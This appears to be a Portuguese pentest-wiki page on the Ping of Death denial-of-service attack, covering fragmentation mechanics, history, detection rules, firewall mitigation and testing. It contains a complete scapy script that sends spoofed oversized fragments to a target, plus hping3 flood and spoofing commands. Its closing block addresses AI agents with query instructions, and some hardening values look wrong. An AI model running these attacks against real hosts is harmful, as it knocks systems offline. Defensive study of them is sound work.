# Ping da Morte ## **📋 Índice** 1. [Fundamentos do Ping da Morte](#-fundamentos-do-ping-da-morte) 2. [Mecanismos Técnicos](#-mecanismos-técnicos) 3. [Histórico e Evolução](#-histórico-e-evolução) 4. [Detecção e Identificação](#-detecção-e-identificação) 5. [Exploração Moderna](#-exploração-moderna) 6. [Mitigação e Prevenção](#-mitigação-e-prevenção) 7. [Cenários e Impacto](#-cenários-e-impacto) 8. [Ferramentas e Testes](#-ferramentas-e-testes) *** ## **🔍 Fundamentos do Ping da Morte** ### **O que é o Ping da Morte** O Ping da Morte é um ataque de negação de serviço (DoS) que explora vulnerabilidades na implementação do protocolo ICMP, enviando pacotes malformados que causam travamento ou reinicialização do sistema alvo. ### **Características Principais** ``` ✅ Ataque de negação de serviço (DoS) ✅ Explora implementações do protocolo ICMP ✅ Utiliza pacotes IP fragmentados ✅ Causa buffer overflow no stack de rede ✅ Afeta sistemas dos anos 90 principalmente ``` ### **Fluxo do Ataque Básico** ```mermaid sequenceDiagram participant A as Atacante participant V as Vítima participant P as Protocol Stack Note over A: FASE 1: Preparação A->>A: Cria pacote ICMP malformado
> 65.535 bytes Note over A,V: FASE 2: Fragmentação A->>V: Envia pacotes fragmentados Note right of V: Pacotes parecem legítimos
durante transmissão Note over V,P: FASE 3: Reconstrução V->>P: Reassembla pacotes Note right of P: Buffer overflow ocorre
durante reassembly Note over V: FASE 4: Exploração P->>V: Estouro de buffer causa
travamento/reboot V->>V: Sistema torna-se instável
ou reinicia ``` *** ## **⚙️ Mecanismos Técnicos** ### **Fundamentos do Protocolo IP/ICMP** #### **Limites do Protocolo IP** ```cpp // Estrutura básica do pacote IP struct ip_header { uint8_t version_ihl; uint8_t tos; uint16_t total_length; // Máximo: 65.535 bytes uint16_t identification; uint16_t flags_fragment; uint8_t ttl; uint8_t protocol; // ICMP = 1 uint16_t checksum; uint32_t source_ip; uint32_t dest_ip; }; // Estrutura do pacote ICMP struct icmp_header { uint8_t type; // 8 = echo request, 0 = echo reply uint8_t code; uint16_t checksum; uint16_t identifier; uint16_t sequence; }; ``` #### **Fragmentação IP** ```bash # Fragmentação normal - Pacote de 1500 bytes em 2 fragmentos Fragmento 1: 1480 bytes + 20 bytes header (Offset: 0, MF: 1) Fragmento 2: 40 bytes + 20 bytes header (Offset: 1480, MF: 0) # Ping da Morte - Pacote de 65.536+ bytes Fragmento 1: 1480 bytes (Offset: 0, MF: 1) Fragmento 2: 1480 bytes (Offset: 1480, MF: 1) ... Fragmento N: 1000 bytes (Offset: 65535, MF: 0) # ESTOURO! ``` ### **Mecanismo do Ataque** #### **Vulnerabilidade de Reassembly** ```cpp // Código vulnerável de reassembly (exemplo simplificado) void reassemble_packet(struct fragment *frags, int count) { char buffer[MAX_IP_PACKET]; // Normalmente 65.535 bytes for(int i = 0; i < count; i++) { int offset = frags[i].offset * 8; // Offset em bytes memcpy(buffer + offset, frags[i].data, frags[i].length); // VULNERABILIDADE: Não verifica se offset + length > 65.535 // Se offset = 65520 e length = 1000 → buffer overflow! } } ``` #### **Cálculo do Estouro de Buffer** ``` Tamanho máximo permitido: 65.535 bytes Tamanho do ataque: 65.536 bytes ou mais Cálculo do overflow: Último fragmento offset: 65.520 bytes Tamanho do dados: 1.000 bytes Posição final: 65.520 + 1.000 = 66.520 bytes Estouro: 66.520 - 65.535 = 985 bytes além do limite ``` ### **Implementação do Pacote Malformado** #### **Construção do Pacote** ```python #!/usr/bin/env python3 # ping_of_death_constructor.py import socket import struct import random from scapy.all import * class PingOfDeathConstructor: def __init__(self, target_ip): self.target_ip = target_ip self.source_ip = self._spoof_ip() def _spoof_ip(self): """Gerar IP source aleatório para evasão""" return ".".join(str(random.randint(1, 254)) for _ in range(4)) def calculate_checksum(self, data): """Calcular checksum do pacote ICMP""" if len(data) % 2: data += b'\x00' checksum = 0 for i in range(0, len(data), 2): word = (data[i] << 8) + data[i+1] checksum += word checksum = (checksum >> 16) + (checksum & 0xffff) checksum += checksum >> 16 return ~checksum & 0xffff def create_oversized_packet(self): """Criar pacote ICMP maior que 65.535 bytes""" # Pacote ICMP normal (8 bytes de header + 1472 de dados) icmp_data = b"A" * 1472 # Dados para preenchimento # Criar pacote ICMP oversized icmp_packet = struct.pack( "!BBHHH", 8, # Type: Echo Request 0, # Code: 0 0, # Checksum (será calculado depois) 1, # Identifier 1 # Sequence Number ) + icmp_data # Calcular checksum correto checksum = self.calculate_checksum(icmp_packet) icmp_packet = struct.pack( "!BBHHH", 8, 0, checksum, 1, 1 ) + icmp_data return icmp_packet def create_malicious_fragments(self): """Criar fragmentos maliciosos para o ataque""" icmp_packet = self.create_oversized_packet() packet_size = len(icmp_packet) + 20 # + IP header print(f"📦 Tamanho total do pacote: {packet_size} bytes") fragments = [] max_fragment_size = 1480 # MTU típica - header IP offset = 0 # Criar fragmentos normais while offset < len(icmp_packet): fragment_data = icmp_packet[offset:offset + max_fragment_size] more_fragments = 1 if (offset + max_fragment_size) < len(icmp_packet) else 0 fragment = IP( dst=self.target_ip, src=self.source_ip, flags=1 if more_fragments else 0, # MF flag frag=offset // 8 # Offset em blocos de 8 bytes )/fragment_data fragments.append(fragment) offset += max_fragment_size # Adicionar fragmento malicioso que causa overflow malicious_offset = 65520 # Offset próximo ao limite máximo malicious_data = b"B" * 1000 # Dados que causam overflow malicious_fragment = IP( dst=self.target_ip, src=self.source_ip, flags=0, # Último fragmento frag=malicious_offset // 8 )/malicious_data fragments.append(malicious_fragment) return fragments def send_attack(self): """Enviar o ataque Ping da Morte""" fragments = self.create_malicious_fragments() print(f"🎯 Alvo: {self.target_ip}") print(f"📊 Fragmentos criados: {len(fragments)}") print("🚀 Enviando ataque...") for i, fragment in enumerate(fragments): try: send(fragment, verbose=0) print(f" 📨 Fragmento {i+1} enviado") except Exception as e: print(f" ❌ Erro no fragmento {i+1}: {e}") print("✅ Ataque concluído") # Uso (APENAS PARA PESQUISA) if __name__ == "__main__": import sys if len(sys.argv) != 2: print("Uso: python ping_of_death_constructor.py ") sys.exit(1) target = sys.argv[1] attacker = PingOfDeathConstructor(target) attacker.send_attack() ``` *** ## **📜 Histórico e Evolução** ### **Linha do Tempo do Ping da Morte** ```mermaid timeline title Evolução do Ping da Morte 1996 : Descoberta inicial
em sistemas Windows
e Unix 1997 : patches liberados
por principais vendors 1998 : Ataque torna-se
pouco efetivo em
sistemas atualizados 2000 : Surge Ping Flood
como variante 2005 : Sistemas modernos
já imunes ao ataque
clássico 2010 : Novas variantes
em dispositivos IoT 2015 : Ataques em
equipamentos legados
e embedded 2020 : Foco em sistemas
SCADA e IoT
desatualizados ``` ### **Sistemas Afetados Originalmente** #### **Sistemas Vulneráveis (1996-1998)** ```yaml Windows: - Windows 95 - Windows NT 4.0 - Windows 3.11 Unix/Linux: - Linux kernels < 2.0.32 - FreeBSD < 2.2.5 - SunOS 4.1.4 - AIX 4.0 Network Equipment: - Cisco IOS versões antigas - Routers 3Com - Switches legados ``` #### **Patches e Correções** ```bash # Linux patches - Kernel 2.0.32+: Validação de tamanho de pacote - Adição de verificações no IP stack # Windows patches - Windows 95: RV2C patch - Windows NT: Service Pack 3 # Cisco IOS - Versões 11.2 e superiores: ICMP packet validation ``` ### **Evolução para Variantes Modernas** #### **Ping Flood** ```bash # Ataque de inundação ICMP moderno hping3 --icmp --flood --rand-source # Com pacotes grandes hping3 --icmp -d 1400 --flood ``` #### **ICMP Smurf Attack** ```bash # Ataque de amplificação # Envia pacotes para broadcast address com IP spoofed hping3 --icmp --spoof ``` *** ## **🔍 Detecção e Identificação** ### **Assinaturas de Detecção** #### **Snort Rules** ```bash # Detecção de Ping da Morte alert icmp any any -> any any (msg:"ICMP Large Packet"; \ dsize: >800; itype:8; classtype:icmp-event; sid:1000001; rev:1;) alert ip any any -> any any (msg:"Possible Ping of Death Fragmentation"; \ fragoffset: >8150; fragbits: M; classtype:attempted-dos; \ sid:1000002; rev:1;) # Detecção de fragmentação maliciosa alert ip any any -> any any (msg:"IP Fragment Overlap"; \ fragbits: M; sameip; detection_filter: track by_src, \ count 30, seconds 1; sid:1000003; rev:1;) ``` #### **Suricata Rules** ```yaml # Suricata detection rules - alert icmp any any -> any any msg: "PING of Death - Oversized ICMP Packet" icmp-type: 8 dsize: >800 classtype: attempted-dos sid: 2100498 rev: 2 - alert ip any any -> any any msg: "Suspicious IP Fragmentation - Possible PoD" ipopts: rr fragbits: M frag-offset: >8000 classtype: bad-unknown sid: 2100499 rev: 1 ``` ### **Ferramentas de Monitoramento** #### **Script de Detecção em Tempo Real** ```python #!/usr/bin/env python3 # ping_of_death_detector.py from scapy.all import * import time import logging from collections import defaultdict class PingOfDeathDetector: def __init__(self, interface=None): self.interface = interface self.fragment_tracker = defaultdict(list) self.suspicious_ips = defaultdict(int) # Configurar logging logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s', handlers=[ logging.FileHandler('pod_detection.log'), logging.StreamHandler() ] ) self.logger = logging.getLogger('PingOfDeathDetector') def detect_oversized_icmp(self, packet): """Detectar pacotes ICMP oversized""" if packet.haslayer(ICMP) and packet[ICMP].type == 8: # Echo Request packet_size = len(packet) if packet_size > 1000: # Threshold para ICMP grande src_ip = packet[IP].src self.logger.warning( f"Oversized ICMP packet detected: {packet_size} bytes from {src_ip}" ) return True return False def detect_malicious_fragmentation(self, packet): """Detectar fragmentação maliciosa""" if packet.haslayer(IP) and packet[IP].flags & 1: # MF flag set fragment_offset = packet[IP].frag src_ip = packet[IP].src # Track fragments per source IP self.fragment_tracker[src_ip].append({ 'offset': fragment_offset, 'timestamp': time.time(), 'size': len(packet) }) # Verificar se offset é suspeito (> 8150) if fragment_offset > 8150: self.logger.warning( f"Suspicious fragment offset: {fragment_offset} from {src_ip}" ) self.suspicious_ips[src_ip] += 1 return True return False def analyze_fragment_pattern(self, src_ip): """Analisar padrão de fragmentação para detectar PoD""" fragments = self.fragment_tracker[src_ip] if len(fragments) < 3: return False # Verificar se há fragmentos com offsets muito altos high_offset_fragments = [f for f in fragments if f['offset'] > 8000] if len(high_offset_fragments) > 0: total_reassembled_size = max(f['offset'] * 8 + f['size'] for f in fragments) if total_reassembled_size > 65535: self.logger.critical( f"PING OF DETECTED: {src_ip} attempting reassembly of {total_reassembled_size} bytes" ) return True return False def cleanup_old_fragments(self): """Limpar fragmentos antigos do tracker""" current_time = time.time() for src_ip in list(self.fragment_tracker.keys()): self.fragment_tracker[src_ip] = [ f for f in self.fragment_tracker[src_ip] if current_time - f['timestamp'] < 60 # Manter apenas últimos 60 segundos ] if not self.fragment_tracker[src_ip]: del self.fragment_tracker[src_ip] def packet_handler(self, packet): """Handler principal para análise de pacotes""" try: if not packet.haslayer(IP): return # Detecção de ICMP oversized self.detect_oversized_icmp(packet) # Detecção de fragmentação maliciosa if self.detect_malicious_fragmentation(packet): src_ip = packet[IP].src self.analyze_fragment_pattern(src_ip) # Limpeza periódica if random.random() < 0.01: # ~1% dos pacotes self.cleanup_old_fragments() except Exception as e: self.logger.error(f"Error processing packet: {e}") def start_detection(self): """Iniciar detecção de Ping da Morte""" self.logger.info("Starting Ping of Death detection...") try: sniff( iface=self.interface, prn=self.packet_handler, filter="ip", store=0 ) except KeyboardInterrupt: self.logger.info("Detection stopped by user") except Exception as e: self.logger.error(f"Detection error: {e}") # Uso if __name__ == "__main__": detector = PingOfDeathDetector("eth0") detector.start_detection() ``` #### **Monitoramento com tcpdump** ```bash # Capturar pacotes ICMP grandes tcpdump -i eth0 'icmp and greater 1000' # Monitorar fragmentação suspeita tcpdump -i eth0 'ip[6:2] & 0x1fff > 8000' # Capturar com análise em tempo real tcpdump -i eth0 -n -l | grep -E '(frag [0-9]+|[0-9]+ bytes)' ``` ### **Sinais de Alerta** #### **Logs do Sistema** ```bash # Linux kernel logs dmesg | grep -i 'icmp\|fragment\|overflow' # Mensagens comuns de erro "kernel: IP: packet too big" "kernel: ICMP: oversize packet" "kernel: reassembly buffer overflow" # System logs grep -i 'icmp' /var/log/syslog grep -i 'denial' /var/log/messages ``` #### **Métricas de Performance** ```bash # Monitorar estatísticas de rede netstat -s | grep -i 'frag\|icmp' # Contadores relevantes "fragments dropped after timeout" "ICMP input packets" "reassembly failures" # Usar ss para conexões ss -s | grep -i 'frag' ``` *** ## **⚔️ Exploração Moderna** ### **Ataques em Sistemas Legados** #### **Alvos Comuns Atuais** ```yaml Industrial Control Systems: - SCADA systems legados - PLCs desatualizados - RTUs com firmware antigo Embedded Devices: - Roteadores antigos - Câmeras IP - Sistemas de vigilância IoT Devices: - Dispositivos com kernel Linux antigo - Equipamentos médicos - Automotivos desatualizados ``` #### **Script de Verificação de Vulnerabilidade** ```python #!/usr/bin/env python3 # pod_vulnerability_scanner.py import socket import subprocess import platform from scapy.all import * class POVulnerabilityScanner: def __init__(self, target_ip): self.target_ip = target_ip self.results = {} def check_icmp_response(self): """Verificar se alvo responde a ICMP""" try: # Ping normal response = subprocess.run( ['ping', '-c', '1', '-W', '2', self.target_ip], capture_output=True, text=True, timeout=5 ) return response.returncode == 0 except: return False def send_safe_test_packet(self): """Enviar pacote de teste seguro para detecção""" try: # Pacote ICMP grande mas dentro dos limites packet = IP(dst=self.target_ip)/ICMP()/("X" * 1000) response = sr1(packet, timeout=2, verbose=0) if response: self.results['icmp_large_response'] = True # Analisar TTL para fingerprinting ttl = response[IP].ttl self.estimate_os_from_ttl(ttl) else: self.results['icmp_large_response'] = False except Exception as e: self.results['error'] = str(e) def estimate_os_from_ttl(self, ttl): """Estimar SO baseado no TTL""" os_guess = "Unknown" if ttl == 64 or ttl == 63: os_guess = "Linux/Unix" elif ttl == 128: os_guess = "Windows" elif ttl == 255: os_guess = "Cisco/Network Device" elif ttl == 60: os_guess = "MacOS" self.results['os_estimate'] = os_guess self.results['ttl'] = ttl def check_known_vulnerable_ports(self): """Verificar portas comuns de sistemas vulneráveis""" vulnerable_ports = { 80: "HTTP - Possible web interface", 21: "FTP - Legacy service", 23: "Telnet - Highly vulnerable", 161: "SNMP - Network equipment", 502: "Modbus - SCADA/ICS" } open_ports = [] for port, description in vulnerable_ports.items(): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(1) result = sock.connect_ex((self.target_ip, port)) sock.close() if result == 0: open_ports.append((port, description)) self.results['open_ports'] = open_ports def generate_report(self): """Gerar relatório de vulnerabilidade""" report = { 'target': self.target_ip, 'icmp_responding': self.check_icmp_response(), 'os_estimate': self.results.get('os_estimate', 'Unknown'), 'ttl': self.results.get('ttl', 'N/A'), 'open_ports': self.results.get('open_ports', []), 'risk_assessment': self.assess_risk() } return report def assess_risk(self): """Avaliar risco baseado nas descobertas""" risk = "LOW" # Fatores que aumentam risco if not self.results.get('icmp_large_response', True): risk = "MEDIUM" # Possível filtro de pacotes grandes if any("SCADA" in desc or "Legacy" in desc for _, desc in self.results.get('open_ports', [])): risk = "HIGH" if self.results.get('os_estimate') == "Windows" and self.results.get('ttl') == 128: risk = "MEDIUM" # Windows antigo pode ser vulnerável return risk def scan(self): """Executar scan completo""" print(f"🔍 Scanning {self.target_ip} for Ping of Death vulnerability...") self.check_icmp_response() self.send_safe_test_packet() self.check_known_vulnerable_ports() return self.generate_report() # Uso para testes legítimos if __name__ == "__main__": import sys if len(sys.argv) != 2: print("Uso: python pod_vulnerability_scanner.py ") sys.exit(1) scanner = POVulnerabilityScanner(sys.argv[1]) report = scanner.scan() print("\n📊 RELATÓRIO DE VULNERABILIDADE") print(f"Alvo: {report['target']}") print(f"Responde ICMP: {report['icmp_responding']}") print(f"SO Estimado: {report['os_estimate']} (TTL: {report['ttl']})") print(f"Avaliação de Risco: {report['risk_assessment']}") if report['open_ports']: print("Portas Abertas:") for port, desc in report['open_ports']: print(f" {port}/tcp - {desc}") ``` ### **Variantes Modernas** #### **ICMP Flood com Fragmentação** ```bash # Usando hping3 para ICMP flood hping3 --icmp --frag --data 1400 --flood # Com source IP aleatório hping3 --icmp --rand-source --frag --data 1400 -i u100 ``` #### **Ataque a Dispositivos IoT** ```python # Exemplo de varredura para dispositivos IoT vulneráveis import nmap def scan_iot_devices(network): nm = nmap.PortScanner() # Scan para dispositivos IoT comuns results = nm.scan( hosts=network, arguments='-sS -p 80,443,23,22,161,162 -O --osscan-guess' ) vulnerable_devices = [] for host in nm.all_hosts(): if nm[host].state() == 'up': # Verificar se é dispositivo potencialmente vulnerável if 'osmatch' in nm[host]: for os_match in nm[host]['osmatch']: if any(keyword in os_match['name'].lower() for keyword in ['embedded', 'router', 'camera', 'iot']): vulnerable_devices.append({ 'ip': host, 'os': os_match['name'], 'ports': list(nm[host]['tcp'].keys()) }) return vulnerable_devices ``` *** ## **🛡️ Mitigação e Prevenção** ### **Estratégias de Defesa em Camadas** #### **1. Configurações de Sistema Operacional** **Linux Hardening** ```bash # Proteções no kernel Linux echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses echo 1 > /proc/sys/net/ipv4/ip_forward # Desativar se não necessário # Limitar taxa de ICMP echo "100" > /proc/sys/net/ipv4/icmp_ratelimit echo "1000" > /proc/sys/net/ipv4/icmp_ratemask # Proteção contra fragmentação echo "1" > /proc/sys/net/ipv4/ipfrag_low_thresh echo "4194304" > /proc/sys/net/ipv4/ipfrag_high_thresh ``` **Windows Hardening** ```powershell # Via Registry para Windows New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" ` -Name "EnableICMPRedirect" -Value 0 -PropertyType DWord New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" ` -Name "SynAttackProtect" -Value 2 -PropertyType DWord # Via Group Policy # - Desabilitar resposta a broadcast ping # - Configurar Windows Firewall para bloquear ICMP ``` #### **2. Configurações de Firewall** **iptables Rules** ```bash # Bloquear pacotes ICMP grandes iptables -A INPUT -p icmp --icmp-type echo-request -m length --length 1000:65535 -j DROP # Proteção contra fragmentação maliciosa iptables -A INPUT -f -j DROP # Bloquear fragmentos iptables -A INPUT -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT iptables -A INPUT -p icmp --icmp-type echo-request -j DROP # Rate limiting para ICMP iptables -A INPUT -p icmp -m limit --limit 10/minute --limit-burst 100 -j ACCEPT iptables -A INPUT -p icmp -j DROP ``` **Configuração Cisco IOS** ```bash ! Bloquear ping da morte em roteadores Cisco access-list 101 deny icmp any any echo 1000 65535 access-list 101 permit icmp any any echo access-list 101 permit icmp any any echo-reply access-list 101 deny icmp any any access-list 101 permit ip any any ! Aplicar ACL interface GigabitEthernet0/0 ip access-group 101 in ``` #### **3. IDS/IPS Configuration** **Suricata Configuration** ```yaml # suricata.yaml - Detecção de Ping da Morte af-packet: - interface: eth0 cluster-id: 99 cluster-type: cluster_flow defrag: yes detect-engine: - profile: high - custom-values: toclient-groups: 50 toserver-groups: 60 # Regras customizadas rule-files: - pod-rules.rules ``` ### **Monitoramento e Resposta** #### **Script de Mitigação Automática** ```python #!/usr/bin/env python3 # pod_mitigation.py import subprocess import logging import time from collections import defaultdict, deque class PingOfDeathMitigator: def __init__(self): self.attack_history = defaultdict(deque) self.blocked_ips = set() logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s' ) self.logger = logging.getLogger('PODMitigator') def block_ip_iptables(self, ip_address): """Bloquear IP usando iptables""" try: # Verificar se já está bloqueado check_cmd = f"iptables -C INPUT -s {ip_address} -j DROP" result = subprocess.run(check_cmd.split(), capture_output=True) if result.returncode != 0: # Bloquear IP block_cmd = f"iptables -I INPUT -s {ip_address} -j DROP" subprocess.run(block_cmd.split(), check=True) self.logger.warning(f"Blocked IP: {ip_address}") self.blocked_ips.add(ip_address) # Agendar desbloqueio (1 hora) self.schedule_unblock(ip_address, 3600) else: self.logger.info(f"IP already blocked: {ip_address}") except subprocess.CalledProcessError as e: self.logger.error(f"Failed to block IP {ip_address}: {e}") def schedule_unblock(self, ip_address, delay): """Agendar desbloqueio de IP""" def unblock(): time.sleep(delay) try: unblock_cmd = f"iptables -D INPUT -s {ip_address} -j DROP" subprocess.run(unblock_cmd.split(), check=True) self.blocked_ips.remove(ip_address) self.logger.info(f"Unblocked IP: {ip_address}") except subprocess.CalledProcessError as e: self.logger.error(f"Failed to unblock IP {ip_address}: {e}") import threading thread = threading.Thread(target=unblock) thread.daemon = True thread.start() def detect_and_mitigate(self, packet_info): """Detectar e mitigar ataques em tempo real""" src_ip = packet_info['src_ip'] current_time = time.time() # Adicionar à história self.attack_history[src_ip].append(current_time) # Manter apenas últimos 60 segundos while (self.attack_history[src_ip] and current_time - self.attack_history[src_ip][0] > 60): self.attack_history[src_ip].popleft() # Verificar se excede threshold if len(self.attack_history[src_ip]) > 50: # 50 pacotes em 60 segundos self.logger.warning(f"High ICMP rate detected from {src_ip}") self.block_ip_iptables(src_ip) return True return False def cleanup(self): """Limpar regras de firewall na saída""" for ip in list(self.blocked_ips): try: unblock_cmd = f"iptables -D INPUT -s {ip} -j DROP" subprocess.run(unblock_cmd.split(), check=True) self.blocked_ips.remove(ip) except subprocess.CalledProcessError: self.logger.error(f"Failed to cleanup IP {ip}") # Uso com scapy para detecção em tempo real from scapy.all import * def start_mitigation(): mitigator = PingOfDeathMitigator() def packet_handler(packet): if packet.haslayer(ICMP) and packet.haslayer(IP): packet_info = { 'src_ip': packet[IP].src, 'size': len(packet), 'timestamp': time.time() } # Detectar pacotes grandes if len(packet) > 1000: mitigator.logger.warning( f"Oversized ICMP from {packet_info['src_ip']}: {packet_info['size']} bytes" ) mitigator.detect_and_mitigate(packet_info) try: sniff(prn=packet_handler, filter="icmp", store=0) except KeyboardInterrupt: mitigator.cleanup() ``` ### **Hardening de Rede** #### **Network Segmentation** ```yaml # Arquitetura de rede segmentada Internet: - DMZ: Servidores públicos - Firewall: Filtragem rigorosa Internal Network: - Segmento de usuários - Segmento de servidores - Segmento IoT/SCADA: Isolado Security Zones: - Untrust: Internet - DMZ: Serviços públicos - Trust: Rede interna - Restricted: Sistemas críticos ``` #### **ACL Best Practices** ```bash # Exemplo de ACL restritiva # Permitir apenas ICMP necessário access-list 150 permit icmp any any echo-reply access-list 150 permit icmp any any time-exceeded access-list 150 permit icmp any any unreachable access-list 150 deny icmp any any echo access-list 150 deny icmp any any 1000 65535 access-list 150 deny ip any any ``` *** ## **💥 Cenários e Impacto** ### **Cenários de Ataque Típicos** #### **Cenário 1: Ataque a Sistema Legado** ```yaml Alvo: Windows NT 4.0 Server Impacto: Blue Screen of Death Tempo de Downtime: 15-30 minutos Recuperação: Reinicialização manual Custo: Perda de produtividade + tempo de IT # Sequência do Ataque 1. Reconhecimento: ICMP respondendo 2. Envio: Pacotes fragmentados maliciosos 3. Exploração: Buffer overflow no IP stack 4. Resultado: Sistema crasha ou reinicia ``` #### **Cenário 2: Ataque a Equipamento de Rede** ```yaml Alvo: Roteador Cisco antigo Impacto: Reinicialização não planejada Tempo de Downtime: 2-5 minutos Recuperação: Auto-recovery Custo: Breve interrupção de rede # Efeitos em Rede - Routing tables corrompidas - Perda temporária de conectividade - Impacto em múltiplos usuários ``` ### **Impacto Business** #### **Classificação de Impacto** ```json { "impacto_critico": { "sistemas": ["SCADA", "Hospitais", "Controle de tráfego"], "consequencias": [ "Parada de produção", "Risco à segurança pública", "Perda financeira significativa" ] }, "impacto_alto": { "sistemas": ["Servidores legados", "ERP crítico"], "consequencias": [ "Downtime prolongado", "Perda de dados temporária", "Violação de SLA" ] }, "impacto_medio": { "sistemas": ["Workstations", "Servidores não críticos"], "consequencias": [ "Interrupção de trabalho", "Reinicialização necessária", "Tempo de IT para recuperação" ] } } ``` #### **Métricas de Downtime** ```bash # Cálculo de custo de downtime Custo por hora: $10,000 (empresa média) Tempo de recuperação: 30 minutos Custo do ataque: $5,000 # Em caso de sistemas críticos Custo por hora: $100,000+ Tempo de recuperação: 2+ horas Custo total: $200,000+ ``` *** ## **🔧 Ferramentas e Testes** ### **Ferramentas de Teste Legítimas** #### **Scapy para Testes Controlados** ```python # teste_pod_seguro.py - Para ambientes controlados from scapy.all import * def test_fragmentation_handling(target_ip): """Testar handling de fragmentação de forma segura""" print(f"🧪 Testando handling de fragmentação em {target_ip}") # Pacote de teste dentro dos limites test_packet = IP(dst=target_ip, flags=1, frag=0)/ICMP()/("A"*500) try: response = sr1(test_packet, timeout=5, verbose=0) if response: print("✅ Sistema responde corretamente a fragmentação") return True else: print("⚠️ Sem resposta - possível filtro de fragmentos") return False except Exception as e: print(f"❌ Erro no teste: {e}") return False def test_icmp_size_limits(target_ip): """Testar limites de tamanho de ICMP""" sizes_to_test = [100, 500, 1000, 1500] for size in sizes_to_test: packet = IP(dst=target_ip)/ICMP()/("X" * size) try: response = sr1(packet, timeout=3, verbose=0) if response: print(f"✅ Tamanho {size} bytes: Responde") else: print(f"❌ Tamanho {size} bytes: Sem resposta") except Exception as e: print(f"❌ Erro com tamanho {size}: {e}") ``` #### **Usando hping3 para Testes** ```bash # Teste de fragmentação seguro hping3 --icmp --frag --data 500 -c 1 # Teste de taxa de ICMP hping3 --icmp --fast -c 100 # Verificar TTL para fingerprinting hping3 --icmp -c 1 ``` ### **Ferramentas de Análise** #### **Wireshark Display Filters** ```bash # Filtrar tráfego suspeito icmp and data.len > 500 ip.flags.mf == 1 and ip.frag_offset > 8000 icmp.type == 8 and frame.len > 1000 # Análise de fragmentação ip.analysis.fragments ip.reassembled_in ``` #### **tshark para Análise em Lote** ```bash # Analisar capturas para Ping da Morte tshark -r capture.pcap -Y "icmp and data.len > 1000" # Estatísticas de fragmentação tshark -r capture.pcap -q -z io,phs # Top conversores ICMP tshark -r capture.pcap -q -z conv,icmp ``` *** ## **⚠️ Considerações Finais** ### **Estado Atual da Vulnerabilidade** #### **Sistemas Modernos** ```yaml Imunes: - Windows 10/11 - Linux Kernel 2.6+ - macOS 10.5+ - Cisco IOS 12.0+ - Juniper JunOS Potencialmente Vulneráveis: - Sistemas legados (Windows XP, Server 2003) - Dispositivos IoT com kernel customizado - Equipamentos industriais antigos - Firmware personalizado não atualizado ``` ### **Lições Aprendidas** #### **Desenvolvimento Seguro** ```cpp // Boas práticas atuais para implementação de protocolos void process_ip_packet(struct ip_header *ip) { // VALIDAÇÃO: Verificar tamanho total if (ntohs(ip->total_length) > MAX_IP_PACKET) { log_drop_packet(ip, "Oversized packet"); return; } // VALIDAÇÃO: Verificar durante reassembly if (current_offset + fragment_length > MAX_IP_PACKET) { log_drop_packet(ip, "Reassembly would exceed max size"); return; } // VALIDAÇÃO: Verificar offsets realistas if (fragment_offset > MAX_REASONABLE_OFFSET) { log_drop_packet(ip, "Suspicious fragment offset"); return; } } ``` #### **Arquitetura de Segurança** ``` 1. DEFESA EM PROFUNDIDADE: - Firewalls de borda - IDS/IPS - Hardening de SO - Segmentação de rede 2. MONITORAMENTO CONTÍNUO: - Detecção de anomalias - Análise de logs - Alertas em tempo real 3. RESPONSE PLAN: - Mitigação automática - Isolamento de tráfego - Análise forense ``` ### **Estatísticas e Tendências** #### **Dados Históricos** ```yaml Prevalência em 1997: 85% dos sistemas vulneráveis Prevalência em 2005: 15% dos sistemas vulneráveis Prevalência em 2020: <1% dos sistemas vulneráveis Ataques Reportados: 1996-2000: Centenas de incidentes 2001-2010: Dezenas de incidentes 2011-2020: Incidentes isolados 2021+: Principalmente em equipamentos legados ``` ### **Recomendações Finais** 1. **PARA ADMINISTRADORES:** * Mantenha sistemas atualizados * Implemente filtros de rede * Monitore tráfego ICMP * Tenha plano de resposta a incidentes 2. **PARA DESENVOLVEDORES:** * Sempre valide input de rede * Implemente bounds checking * Use bibliotecas de rede validadas * Teste handling de casos extremos 3. **PARA AUDITORES:** * Verifique sistemas legados * Teste controles de rede * Valide configurações de firewall * Revise logs de segurança **🔐 Lembre-se**: Embora o Ping da Morte clássico seja amplamente mitigado em sistemas modernos, os princípios por trás dele ainda são relevantes para entender vulnerabilidades de buffer overflow e a importância da validação de entrada em sistemas de rede. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xmorte.gitbook.io/bibliadopentestbr/tecnicas/rede-and-infraestrutura/tcp/ping-da-morte.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.